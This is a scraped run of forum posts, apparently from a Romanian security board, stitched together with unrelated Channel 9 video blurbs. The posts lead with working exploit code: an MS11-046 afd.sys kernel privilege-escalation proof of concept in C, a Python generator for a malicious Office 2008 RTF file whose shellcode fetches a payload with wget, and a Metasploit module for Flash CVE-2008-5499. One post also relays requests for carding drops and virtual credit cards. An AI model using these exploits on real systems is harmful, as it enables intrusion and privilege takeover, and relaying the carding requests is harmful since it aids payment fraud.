I Rahul Sasi(fb1h2s) just made the POC exploit available .
Reference: ms8-66, ms6-49
*************************************************************
Too lazy to add the shellcode , you could steal this one, it should work .
http://www.whitecell.org/list.php?id=50
The shell code to achieve privilege escalation as per the article used the following steps
http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf .
1) Use PslookupProcessId get system token
2) Replace it with the current process token, and we are system
*************************************************************
*/

#define SystemModuleInformation 11

#ifndef WIN32_LEAN_AND_MEAN
#define WIN32_LEAN_AND_MEAN
#endif

#ifndef _WIN32_WINNT //For XP Only
#define _WIN32_WINNT 0x0501
#endif

// We have a client sock connecting to 135 considering the fact it's open by default
#define DEFAULT_ADDR "127.0.0.1"
#define DEFAULT_PORT "135"

#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <iphlpapi.h>
#include <stdio.h>

#pragma comment(lib, "Ws2_32.lib")
#pragma comment (lib, "ntdll.lib")

//lets make a nop ret sandwich
unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90";

/*
The shell code to achieve privilege escalation
Add your shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf the malware used the following method.
1) Use PslookupProcessId get system token
2) Replace it with the current process token, and we are system
*/

// he gets the above sandwich
LPVOID hexcode_addr = (LPVOID)0x00000000;
DWORD sizeofshell = 0x1000;

// he gets the haldispatch
ULONG_PTR HalDispatchTable;

//Holds the base address of krnl
PVOID krl_base;

//load address of those %krnl%.exe dudes
HMODULE krl_addr;

// structure system_module_info data
typedef struct _SYSTEM_MODULE_INFORMATION {
    ULONG Reserved[2];
    PVOID Base;
    ULONG Size;
    ULONG Flags;
    USHORT Index;
    USHORT Unknown;
    USHORT LoadCount;
    USHORT ModuleNameOffset;
    CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

//sock addrinfo
struct addrinfo *result = NULL, *ptr = NULL, hints;

// The list of loaded drivers
typedef LONG NTSTATUS, *PNTSTATUS;

NTSTATUS NTAPI ZwQuerySystemInformation(
    IN ULONG SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength);

typedef enum _KPROFILE_SOURCE {
    ProfileTime,
    ProfileAlignmentFixup,
    ProfileTotalIssues,
    ProfilePipelineDry,
    ProfileLoadInstructions,
    ProfilePipelineFrozen,
    ProfileBranchInstructions,
    ProfileTotalNonissues,
    ProfileDcacheMisses,
    ProfileIcacheMisses,
    ProfileCacheMisses,
    ProfileBranchMispredictions,
    ProfileStoreInstructions,
    ProfileFpInstructions,
    ProfileIntegerInstructions,
    Profile2Issue,
    Profile3Issue,
    Profile4Issue,
    ProfileSpecialInstructions,
    ProfileTotalCycles,
    ProfileIcacheIssues,
    ProfileDcacheAccesses,
    ProfileMemoryBarrierCycles,
    ProfileLoadLinkedIssues,
    ProfileMaximum
} KPROFILE_SOURCE, *PKPROFILE_SOURCE;

typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,PULONG Interval );

typedef NTSTATUS (WINAPI *PNTALLOCATE)(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect );

int main()
{
    //All the declarations goes here
    PNTQUERYINTERVAL ZwQueryIntervalProfile;
    PNTALLOCATE ZwAllocateVirtualMemory;
    KPROFILE_SOURCE stProfile = ProfileTotalIssues;
    ULONG Ret_size;
    NTSTATUS status,alloc_status ;
    ULONG i, n, *q;
    PSYSTEM_MODULE_INFORMATION p;
    void *base;
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    int iResult;
    DWORD ibuf [0x30];
    DWORD obuf [0x30];
    ULONG_PTR result;

    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) ");

    /*
    MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S .
    Ronnie Johndas wrote the writeup dissecting a malware with the exploit details .
    I Rahul Sasi(fb1h2s) just made the POC exploit available .
    Reference: ms8_66, ms6_49 http://www.whitecell.org/list.php?id=50 exp codes
    */

    status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n);

    q = (ULONG *)malloc(n * sizeof(*q));
    if (q == NULL) {
        perror("malloc");
        return -1;
    }

    status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL);

    p = (PSYSTEM_MODULE_INFORMATION)(q + 1);
    base = NULL;

    // Loop Loop The table and check for our krl
    for (i = 0; i < *q; i++)
    {
        if( strstr(p[i].ImageName,"ntkrnlpa.exe") )
        {
            printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n");
            krl_addr = LoadLibraryExA("ntkrnlpa.exe",0,1);
            printf("\t Base: 0x%x size: %u\t%s\n", p[i].Base, p[i].Size, p[i].ImageName);
            krl_base = p[i].Base;
            break;
        }
        else if(strstr(p[i].ImageName,"ntoskrnl.exe"))
        {
            printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n");
            krl_addr = LoadLibraryExA("ntoskrnl.exe",0,1);
            printf("\t Base Adress: 0x%x ",p[i].Base);
            krl_base = p[i].Base;
            break;
        }
        else
        {
            printf("\n [+]Cdnt find, and am out\n");
            exit(0);
        }
    }

    free(q);

    printf("\n[+] Continue with Exploitation\n");

    HalDispatchTable = (ULONG_PTR)GetProcAddress(krl_addr, "HalDispatchTable");
    if( !HalDispatchTable )
    {
        printf("[!!] Sh*t happen with HalDispatchTablen");
        return FALSE;
    }

    printf("\tBase Nt=: 0x%x ",krl_base);

    HalDispatchTable -= ( ULONG_PTR )krl_addr;
    HalDispatchTable += krl_base;

    printf("\n[+] HalDispatchTable found \t\t\t [ 0x%p ]\n",HalDispatchTable);

    printf("[+] ZwQueryIntervalProfile ");
    ZwQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQueryIntervalProfile");
    if( !ZwQueryIntervalProfile )
    {
        printf("[!!] Sh*t happen resolving ZwQueryIntervalProfile\n");
        return FALSE;
    }
    printf( "\t\t\t [ 0x%p ]\n",ZwQueryIntervalProfile );

    printf("[+] ZwAllocateVirtualMemory");
    ZwAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "ZwAllocateVirtualMemory");
    if( !ZwAllocateVirtualMemory )
    {
        printf("[!!] Unable to resolve ZwAllocateVirtualMemory\n");
        return FALSE;
    }
    printf( "\t\t\t [ 0x%p ]\n",ZwAllocateVirtualMemory );

    printf("\n[+] Allocating memory at [ 0x%p ]...\n",hexcode_addr);
    alloc_status = ZwAllocateVirtualMemory(
        INVALID_HANDLE_VALUE,
        &hexcode_addr,
        0,
        &sizeofshell,
        MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
        PAGE_EXECUTE_READWRITE );

    printf("\n[+] status %p.\n",alloc_status );
    if( alloc_status != 0 )
    {
        printf("[-] Sh*t happen with NtAllocateVirtualMemory() , %#X\n", alloc_status);
    }
    printf("\t\tZwAllocateVirtualMemory() Allocated return Status, %#X\n", alloc_status);

    memset(hexcode_addr, 0x90, sizeofshell);
    memcpy( (void*)((BYTE*)hexcode_addr + 0x100),(void*)hexcode, sizeof(hexcode));

    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != 0) {
        printf("WASUP Failed: %d\n", iResult);
        return 1;
    }

    iResult = getaddrinfo(DEFAULT_ADDR, DEFAULT_PORT, &hints, &result);
    ptr=result;

    // SOCKET for connecting to localhost at 135
    ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol);
    if (ConnectSocket == INVALID_SOCKET) {
        printf("[-] This is bad , Socket Error : %ld\n", WSAGetLastError());
        freeaddrinfo(result);
        WSACleanup();
        return 1;
    }

    // Connect to server.
    iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
    if (iResult == SOCKET_ERROR) {
        closesocket(ConnectSocket);
        ConnectSocket = INVALID_SOCKET;
        printf("[+]Unable to connect to server, modify code and add a server socket, and connect to it!\n");
        WSACleanup();
        return ;
    }
    else {
        printf("[+]Hola Connected to server !\n");
    }

    memset(ibuf,0x90,sizeof(ibuf));
    memset(obuf,0x90,sizeof(obuf));

    DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)obuf,0, &Ret_size, NULL);

    for( i = 0; i < sizeof( hints ) ; i++)
    {
        printf(" %02X ",(unsigned char)obuf[i]);
    }

    printf("\n\n[+] Overwriting HalDispatchTable with those bytes...");
    DeviceIoControl((HANDLE)ConnectSocket, 0x12007, (LPVOID)ibuf,sizeof(ibuf), (LPVOID)HalDispatchTable,0, &Ret_size, NULL);

    printf("\n\n[+] This should work and break...");
    ZwQueryIntervalProfile(stProfile,&result);
}
Source: MS11-046 Afd.sys Proof of Concept
  12. [h=1]Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service[/h]
Source: http://www.securityfocus.com/bid/52735/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error. An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
The following Wireshark versions are vulnerable:
1.4.0 through 1.4.11
1.6.0 through 1.6.5
PoC: http://www.exploit-db.com/sploits/18758.pcap
Source: Wireshark 'call_dissector()' NULL Pointer Dereference Denial Of Service
  13. [h=1]Office 2008 sp0 RTF Pfragments MAC exploit[/h] #RTF Pfragments exploit for MAC office 2008 #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com #Advanced Hacking Trainings - http://training.aslitsecurity.com #Web - http://www.aslitsecurity.com/ #Blog - http://www.aslitsecurity.blogspot.com/ #Office 2007 for MC SP 0 #!/usr/bin/python myfile = ( "\x7b\x5c\x72\x74\x66\x31\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7b" "\x5c\x73\x6e\x20\x70\x46\x72\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b" "\x5c\x73\x76\x20\x39\x3b\x32\x3b\x31\x31\x31\x31\x31\x31\x31\x31" "\x37\x35\x30\x30\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" "f069837c" # call esp "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31" "\x31\x31\x31\x31\x30\x30\x30\x30\x30\x30\x30\x30\x62\x61\x30\x30" "\x30\x30\x35\x30\x30\x30\x36\x36\x38\x31\x63\x61\x66\x66\x30\x66" "\x34\x32\x35\x32\x36\x61\x30\x32\x35\x38\x63\x64\x32\x65\x33\x63" "\x30\x35\x35\x61\x37\x34\x65\x66\x62\x38\x37\x30\x36\x39\x36\x65" "\x36\x37\x38\x62\x66\x61\x61\x66\x37\x35\x65\x61\x61\x66\x37\x35" "\x65\x37\x35\x37\x63\x33\x7d\x7d\x7d\x7d" ) sign = ( "\x70\x69\x6e\x67\x70\x69\x6e\x67" ) shellcode = "\xCC\xCC\xCC\xCC" shellcode += "http://www.site.com/payload.DMG" shellcode += "\x11\x3A\x65\x89\x11\x3A\x65\x89\x11\x3A\x65\x89" #("wget http://") shellcode += "wget " shellcode += "\x1A\x18\x19\x02" exploit = open("output.doc", mode="wb") exploit.write(myfile + sign + shellcode) print "Done" Sursa: Office 2008 sp0 RTF Pfragments MAC exploit
  14. [h=1]Adobe Flash Player ActionScript Launch Command Execution Vulnerability[/h]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
      'Description' => %q{
        This module exploits a vulnerability in Adobe Flash Player for Linux,
        version 10.0.12.36 and 9.0.151.0 and prior.
        An input validation vulnerability allows command execution when the browser
        loads a SWF file which contains shell metacharacters in the arguments to
        the ActionScript launch method.
        The victim must have Adobe AIR installed for the exploit to work. This module
        was tested against version 10.0.12.36 (10r12_36).
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
        ],
      'References' =>
        [
          ['CVE', '2008-5499'],
          ['OSVDB', '50796'],
          ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
          ['URL', 'http://www.securityfocus.com/bid/32896/exploit']
        ],
      'DefaultOptions' =>
        {
          'HTTP::compression' => 'gzip',
          'HTTP::chunked' => true
        },
      'Platform' => 'unix', # so unix cmd exec payloads are ok
      'Arch' => ARCH_CMD,
      'Targets' =>
        [
          [ 'Automatic', {}],
        ],
      'DisclosureDate' => 'Dec 17 2008',
      'DefaultTarget' => 0))
  end

  def exploit
    path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
    fd = File.open( path, "rb" )
    @swf = fd.read(fd.stat.size)
    fd.close

    super
  end

  def on_request_uri(cli, request)
    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
    trigger = @swf
    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"

    obj_id = rand_text_alpha(rand(6)+3)

    if request.uri.match(/\.swf/i)
      print_status("#{msg} Sending Exploit SWF")
      send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
      return
    end

    if request.uri.match(/\.txt/i)
      send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
      return
    end

    html = <<-EOS
    <html>
    <head>
    </head>
    <body>
    <center>
    <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
    id="#{obj_id}" width="1" height="1"
    codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    <param name="movie" value="#{get_resource}#{trigger_file}" />
    <embed src="#{get_resource}#{trigger_file}" quality="high"
    width="1" height="1" name="#{obj_id}" align="middle"
    allowNetworking="all"
    type="application/x-shockwave-flash"
    pluginspage="http://www.macromedia.com/go/getflashplayer">
    </embed>
    </object>
    </center>
    </body>
    </html>
    EOS

    print_status("#{msg} Sending HTML...")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end
Source: Adobe Flash Player ActionScript Launch Command Execution Vulnerability
  15. Blah blah blah. I want to see that picture. That's so that I don't ban both of you.
  16. Hi, I made a first version of the application for reading private messages. I know it looks like shit, but it's somewhat functional, a bit limited for now.
Limitations:
- it looks like hell
- the code isn't exactly professionally written
- by default, it displays only the last 30 private messages
- it has no pagination of any kind
- it returns only the last 100 (LIMIT) results (DESC) of searches
- it has no protection against CSRF (laziness) or SQL Injection (so that there are no problems with the searches)
- if the message is sent to several people, it doesn't display them
I'll work on it some more, maybe tomorrow or soon, it's 4:43 AM now.
For now only these have access:
- 3871 = Nytro
- 989 = Zatarra
- 21017 = pyth0n3
- 13607 = begood
- 15061 = MrRip
- 1 = []kw3rln
If anyone else wants access, contact me. Let me know about any problems.
Link: https://rstcenter.com/linkeditat
Good luck.
  17. JavaScript Deobfuscation: A Manual Approach
Sudeep Singh, 4/15/2012
Table of Contents:
- Preface
- Reasons for JavaScript Obfuscation
- Javascript Minifiers vs Obfuscators
- Methods of JavaScript Obfuscation
- Basic JavaScript Obfuscation
- Blackhole Exploit Kit
- Breaking Point Obfuscated JS Challenge
- JS Obfuscation in MetaSploit Framework
- Conclusion
- References
Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18746.pdf
  18. Good, we'll keep seeding.
  19. https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/
  20. Nytro

    RST Market

    I don't know what you wrote above, but in RST Market, unapproved:
dxbut: I need a drop (a person who receives a package with carded products). We'll talk.
------------------------------------------------------------------------
napoletanii: I'm buying a Virtual Credit Card with 50 usd on it, preferably a visa, and one I can receive payments on. I pay in LR. Estimate: for a vcc with a balance of 50 usd I pay 68 usd. I tried 2 sites out of the multitude of "colors" on google (not having had time to find out whether the sites are really safe). https://www.instantvirtualcreditcards.com I received the card instantly, but the cards come with small amounts (between 5/10 usd). Buy VCC(Virtual Credit Card) Paypal VCC | Facebook VCC | ebay VCC | Facebook Coupons |and Virtual Credit Card for Online Purchase is a new site made in January and I tried it, the transaction has been pending for 2 days ;) and as a result I ended up with this option.
  21. Holy shit, you people are out of your minds. Now 2 dollars a day, now 5 dollars a week... What the hell do you do with this "money"? Get jobs as windshield washers; those gypsy kids earn 25-30 RON a day, that is 10 dollars a day, which means they piss all over you, you beggars. Money from clicks? Can't you do anything else? Is that all your gray matter has to offer, clicking? Do some damn projects, 2-3 for free, then 2-3 cheaper ones, then the money comes, things pile up on your CV, you get hired and take 1500 - 2000 RON as a first salary, that is more than 2 dollars a day.
  22. [h=1]GoingNative 6: Walter Bright and Andrei Alexandrescu - D Programming Language[/h]
Posted: Feb 21, 2012 at 4:21 PM By: Charles
We're back! Sorry for the delay between episodes, but we were busy preparing and then putting on GoingNative 2012, a C++11 conference that you have hopefully heard about. It was a blast! Such great speakers. Such great attendees. Huge thanks to all of you who made the journey to Redmond for two days, bringing with you so much IQ and C++ love. And to those who watched the show live online, thank you, too, of course! All sessions will always be available on-demand right here on C9. Watch at your leisure, but do watch/listen/learn!
We were fortunate and honored to have Andrei Alexandrescu speaking and Walter Bright in attendance at GoingNative 2012. Walter and Andrei are the co-custodians of the D programming language. Walter invented D about 11 or 12 years ago. Andrei has been an unrelenting champion and contributor to D for a long time and is the author of the book The D Programming Language. When/why did Andrei get involved with D? We'll find out. We filmed a conversation with these two legends right after GoingNative 2012 ended.
So, what is D? What makes it special? D is a modern native programming language (not really an evolution of C++ as the name might imply. C++11 is an evolution of C++... D is its own thing. It's D.). D is imperative (with C-like syntax), statically-typed, object-oriented, dynamic-friendly (via static type inference), garbage collected (optional), shared-nothing by default (nice!), functional-friendly (you can write pure functions that are verifiably pure), polymorphic, generic, and COM-friendly, too. D is also a low-level systems programming language. D takes many powerful modern programming ideas and idioms and makes them easy to use while keeping things purely native. We love this! Too often we hear things like, "Well, if you go fully native then you lose productivity..." Whatever. D proves you can have your cake and eat it, too.
Tune in. Meet Walter and Andrei (and D, if you're not familiar with it). Thanks for spending time with C9, Walter and Andrei! Keep pushing the native envelope. "I want 1,000,000 users", says Andrei. Go D!
- Download D
- D Forums (written in D)
- Modern COM Programming in D
Table of Contents:
[00:00] GoingNative(); //Welcome back! Sorry for the delay. GoingNative 2012. D.
[02:22] Charles has a conversation with Andrei Alexandrescu and Walter Bright about the D programming language
[56:52] ~GoingNative(); //Charles and Diego talk about D and then destruct.
Download:
http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-6-The-D-Episode-with-Walter-Bright-and-Andrei-Alexandrescu
  23. [h=1]GoingNative 5: Inside the Visual C++ IDE, Meet Raul Pérez[/h]
Posted: Dec 28, 2011 at 10:21 AM By: Charles
Happy Holidays to all of you out there who are in some sort of holiday state. If not, then happy holidays anyway from Diego, Charles, C9, and VC.
We don't cover software testing—the job discipline—often enough on C9. We aim to change that starting now. A friend of Diego's on the VC++ team, Raul Pérez, is a software developer from Puerto Rico who works in QA for the Visual C++ IDE team. He writes tests to make sure the very-front-end of the VC toolchain—the IDE and its design-time compiler infrastructure—works as expected.
There's a lot going on when you type characters into the VC++ editor. What happens, exactly? Why? What types of things can make Intellisense fast? What types of things can hinder the performance of the IDE? How does all of this magic happen? There's a compiler involved in all of this. It's not the front-end compiler (cl), but it is a front-end compiler and it compiles your source into data that's stored in a local DB for design-time use by Intellisense, Go-To-Definition, Syntax Coloring, Reference Highlighting, Auto-Completion, etc... All of these things are part of the set of IDE features that make Visual C++ visual...
So, meet Raul and learn a thing or two about how the IDE works under the covers and how the system has evolved over time.
Table of Contents (click time code links to navigate player accordingly)
[00:00] GoingNative();//Getting faster at show construction - still have some optimizations to make...
[01:56] Charles interviews Raul about Raul and the VC++ design-time system (Intellisense, Go-to-Definition, Auto-complete, Syntax coloring, etc...)
[37:20] ~GoingNative(); //We're really performant this time
We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative [at] hotmail [dot] com. We will read and respond to all messages! That's how we roll, brothers and sisters. And if you're a Facebook user, please join our C9::GoingNative Facebook group. Go native!
Download:
http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-5-Inside-the-Visual-C-ID-Meet-Raul-Prez
  24. [h=1]GoingNative 3: The C++/CX Episode with Marian Luparu[/h]
Posted: Oct 26, 2011 at 10:24 AM By: Charles
This is the C++/CX episode - everything you ever wanted to know, but were afraid to ask... C++/CX language design team member Marian Luparu sits in the hot seat to answer some questions (a few from the GoingNative community - thank you!), draw on the whiteboard and demo some code. It's all about C++/CX. Tune in.
Table of Contents (click time code links to navigate player accordingly)
[00:00] GoingNative(); //Welcome. Diego spreads the news.
[06:05] Charles interviews Marian Luparu (Whiteboarding included)
[43:04] Marian Luparu demos some C++/CX and C++
[58:37] ~GoingNative(); //Charles and Diego recap. Don't fear the hat.
We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative at hotmail com. We will read and respond to all messages! That's how we roll, brothers and sisters. If you are a Facebook user, then please join our C9::GoingNative Facebook group. Go native!
Download:
http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-3-The-CCX-Episode-with-Marian-Luparu